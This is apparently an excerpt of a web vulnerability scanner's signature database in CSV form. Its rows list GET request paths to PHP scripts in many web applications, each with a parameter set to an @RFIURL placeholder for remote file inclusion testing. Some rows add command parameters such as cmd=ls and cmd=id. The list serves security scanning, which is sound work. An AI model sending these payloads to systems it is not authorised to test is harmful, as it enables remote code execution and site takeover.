"005585","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/module/referenz.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005586","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005587","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005588","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005589","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005590","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplinks/includes/smarty.php?full_path_to_public_program=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005591","https://gist.github.com/mubix/5d269c686584875015a2","c","/phporacleview/inc/include_all.inc.php?page_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005592","https://gist.github.com/mubix/5d269c686584875015a2","c","/phporacleview/inc/include_all.inc.php?page_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005593","https://gist.github.com/mubix/5d269c686584875015a2","c","/phppc/poll.php?is_phppc_included=1&relativer_pfad=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005594","https://gist.github.com/mubix/5d269c686584875015a2","c","/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005595","https://gist.github.com/mubix/5d269c686584875015a2","c","/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005596","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpquickgallery/gallery_top.inc.php?textFile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005597","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpreactor/inc/polls.inc.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005598","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpreactor/inc/updatecms.inc.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005599","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpreactor/inc/users.inc.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005600","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpreactor/inc/view.inc.php?pathtohomedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005601","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpress/adisplay.php?lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005602","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpunity-postcard.php?plgallery_epost=1&gallery_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005603","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005604","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005605","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpyabs/moduli/libri/index.php?Azione=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005606","https://gist.github.com/mubix/5d269c686584875015a2","c","/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005607","https://gist.github.com/mubix/5d269c686584875015a2","c","/playlist.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005608","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugin/HP_DEV/cms2.php?s_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005609","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugin/HP_DEV/cms2.php?s_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005610","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugin/gateway/gnokii/init.php?apps_path[plug]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005611","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/1_Adressbuch/delete.php?folder=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005612","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/BackUp/Archive.php?bkpwp_plugin_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005613","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005614","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005615","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005616","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/links/functions.inc?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005617","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/polls/functions.inc?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005618","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/rss_importer_functions.php?sitepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005619","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/safehtml/HTMLSax3.php?dir[plugins]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005620","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/safehtml/safehtml.php?dir[plugins]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005621","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005622","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005623","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005624","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005625","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005626","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005627","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/Import.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005628","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/LogView.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005629","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005630","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005631","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005632","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005633","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/staticpages/functions.inc?_CONF[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005634","https://gist.github.com/mubix/5d269c686584875015a2","c","/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005635","https://gist.github.com/mubix/5d269c686584875015a2","c","/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005636","https://gist.github.com/mubix/5d269c686584875015a2","c","/plus.php?_pages_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005637","https://gist.github.com/mubix/5d269c686584875015a2","c","/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005638","https://gist.github.com/mubix/5d269c686584875015a2","c","/pmi_v28/Includes/global.inc.php?strIncludePrefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005639","https://gist.github.com/mubix/5d269c686584875015a2","c","/pmi_v28/Includes/global.inc.php?strIncludePrefix=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005640","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005641","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005642","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005643","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005644","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005645","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005646","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005647","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005648","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/login.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005649","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005650","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005651","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005652","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005653","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005654","https://gist.github.com/mubix/5d269c686584875015a2","c","/podcastgen1.0beta2/core/recent_list.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005655","https://gist.github.com/mubix/5d269c686584875015a2","c","/poll/view.php?int_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005656","https://gist.github.com/mubix/5d269c686584875015a2","c","/pollvote.php?pollname=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005657","https://gist.github.com/mubix/5d269c686584875015a2","c","/pop.php?base=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005658","https://gist.github.com/mubix/5d269c686584875015a2","c","/popup_window.php?site_isp_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005659","https://gist.github.com/mubix/5d269c686584875015a2","c","/popup_window.php?site_isp_root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005660","https://gist.github.com/mubix/5d269c686584875015a2","c","/port.php?content=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005661","https://gist.github.com/mubix/5d269c686584875015a2","c","/portal/includes/portal_block.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005662","https://gist.github.com/mubix/5d269c686584875015a2","c","/portal/portal.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005663","https://gist.github.com/mubix/5d269c686584875015a2","c","/portfolio.php?id=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005664","https://gist.github.com/mubix/5d269c686584875015a2","c","/portfolio/commentaires/derniers_commentaires.php?rep=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005665","https://gist.github.com/mubix/5d269c686584875015a2","c","/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005666","https://gist.github.com/mubix/5d269c686584875015a2","c","/prepare.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005667","https://gist.github.com/mubix/5d269c686584875015a2","c","/prepare.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005668","https://gist.github.com/mubix/5d269c686584875015a2","c","/prepend.php?_PX_config[manager_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005669","https://gist.github.com/mubix/5d269c686584875015a2","c","/preview.php?php_script_path=@RFIURL?&cmd=dir","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005670","https://gist.github.com/mubix/5d269c686584875015a2","c","/principal.php?conteudo=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005671","https://gist.github.com/mubix/5d269c686584875015a2","c","/print.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005672","https://gist.github.com/mubix/5d269c686584875015a2","c","/print.php?pager=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005673","https://gist.github.com/mubix/5d269c686584875015a2","c","/print.php?print=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005674","https://gist.github.com/mubix/5d269c686584875015a2","c","/process.php?DEFAULT_SKIN=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005675","https://gist.github.com/mubix/5d269c686584875015a2","c","/professeurs/index.php?repertoire_config=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005676","https://gist.github.com/mubix/5d269c686584875015a2","c","/profil.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005677","https://gist.github.com/mubix/5d269c686584875015a2","c","/projects/weatimages/demo/index.php?ini[langpack]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005678","https://gist.github.com/mubix/5d269c686584875015a2","c","/promocms/newspublish/include.php?path[bdocroot]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005679","https://gist.github.com/mubix/5d269c686584875015a2","c","/protection.php?logout_page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005680","https://gist.github.com/mubix/5d269c686584875015a2","c","/provider/auth.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005681","https://gist.github.com/mubix/5d269c686584875015a2","c","/provider/auth.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005682","https://gist.github.com/mubix/5d269c686584875015a2","c","/psynch/nph-psa.exe?css=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005683","https://gist.github.com/mubix/5d269c686584875015a2","c","/psynch/nph-psf.exe?css=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005684","https://gist.github.com/mubix/5d269c686584875015a2","c","/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005685","https://gist.github.com/mubix/5d269c686584875015a2","c","/public_html/modules/Forums/favorites.php?nuke_bb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005686","https://gist.github.com/mubix/5d269c686584875015a2","c","/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005687","https://gist.github.com/mubix/5d269c686584875015a2","c","/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005688","https://gist.github.com/mubix/5d269c686584875015a2","c","/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005689","https://gist.github.com/mubix/5d269c686584875015a2","c","/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005690","https://gist.github.com/mubix/5d269c686584875015a2","c","/qte_web.php?qte_web_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005691","https://gist.github.com/mubix/5d269c686584875015a2","c","/quick_reply.php?phpbb_root_path=@RFIURL&mode=[file]","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005692","https://gist.github.com/mubix/5d269c686584875015a2","c","/quickie.php?QUICK_PATH=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005693","https://gist.github.com/mubix/5d269c686584875015a2","c","/random2.php?path_to_folder=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005694","https://gist.github.com/mubix/5d269c686584875015a2","c","/randshop/index.php?incl=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005695","https://gist.github.com/mubix/5d269c686584875015a2","c","/rdf.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005696","https://gist.github.com/mubix/5d269c686584875015a2","c","/reactivate.php?base_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005697","https://gist.github.com/mubix/5d269c686584875015a2","c","/read.php?data=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005698","https://gist.github.com/mubix/5d269c686584875015a2","c","/readmore.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005699","https://gist.github.com/mubix/5d269c686584875015a2","c","/recent.php?insPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005700","https://gist.github.com/mubix/5d269c686584875015a2","c","/rechnung.php?_PHPLIB[libdir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005701","https://gist.github.com/mubix/5d269c686584875015a2","c","/reconfig.php?GLOBALS[CLPath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005702","https://gist.github.com/mubix/5d269c686584875015a2","c","/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005703","https://gist.github.com/mubix/5d269c686584875015a2","c","/redirect.php?url=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005704","https://gist.github.com/mubix/5d269c686584875015a2","c","/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005705","https://gist.github.com/mubix/5d269c686584875015a2","c","/register.php?base_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005706","https://gist.github.com/mubix/5d269c686584875015a2","c","/releasenote.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005707","https://gist.github.com/mubix/5d269c686584875015a2","c","/rempass.php?lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005708","https://gist.github.com/mubix/5d269c686584875015a2","c","/report.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005709","https://gist.github.com/mubix/5d269c686584875015a2","c","/reports/who_r.php?bj=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005710","https://gist.github.com/mubix/5d269c686584875015a2","c","/resources/includes/class.Smarty.php?cfg[sys][base_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005711","https://gist.github.com/mubix/5d269c686584875015a2","c","/ressourcen/dbopen.php?home=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005712","https://gist.github.com/mubix/5d269c686584875015a2","c","/robotstats.inc.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005713","https://gist.github.com/mubix/5d269c686584875015a2","c","/root/public/code/cp_html2txt.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005714","https://gist.github.com/mubix/5d269c686584875015a2","c","/routines/fieldValidation.php?jssShopFileSystem=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005715","https://gist.github.com/mubix/5d269c686584875015a2","c","/rspa/framework/Controller_v4.php?__ClassPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005716","https://gist.github.com/mubix/5d269c686584875015a2","c","/rspa/framework/Controller_v4.php?__ClassPath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005717","https://gist.github.com/mubix/5d269c686584875015a2","c","/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005718","https://gist.github.com/mubix/5d269c686584875015a2","c","/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005719","https://gist.github.com/mubix/5d269c686584875015a2","c","/rss.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005720","https://gist.github.com/mubix/5d269c686584875015a2","c","/rss.php?phpraid_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005721","https://gist.github.com/mubix/5d269c686584875015a2","c","/rss.php?premodDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005722","https://gist.github.com/mubix/5d269c686584875015a2","c","/rss2.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005723","https://gist.github.com/mubix/5d269c686584875015a2","c","/run.php?dir=SHELL?&file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005724","https://gist.github.com/mubix/5d269c686584875015a2","c","/s01.php?shopid=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005725","https://gist.github.com/mubix/5d269c686584875015a2","c","/s01.php?shopid=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005726","https://gist.github.com/mubix/5d269c686584875015a2","c","/s02.php?shopid=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005727","https://gist.github.com/mubix/5d269c686584875015a2","c","/s03.php?shopid=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005728","https://gist.github.com/mubix/5d269c686584875015a2","c","/s04.php?shopid=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005729","https://gist.github.com/mubix/5d269c686584875015a2","c","/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005730","https://gist.github.com/mubix/5d269c686584875015a2","c","/sablonlar/gunaysoft/gunaysoft.php?sayfaid=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 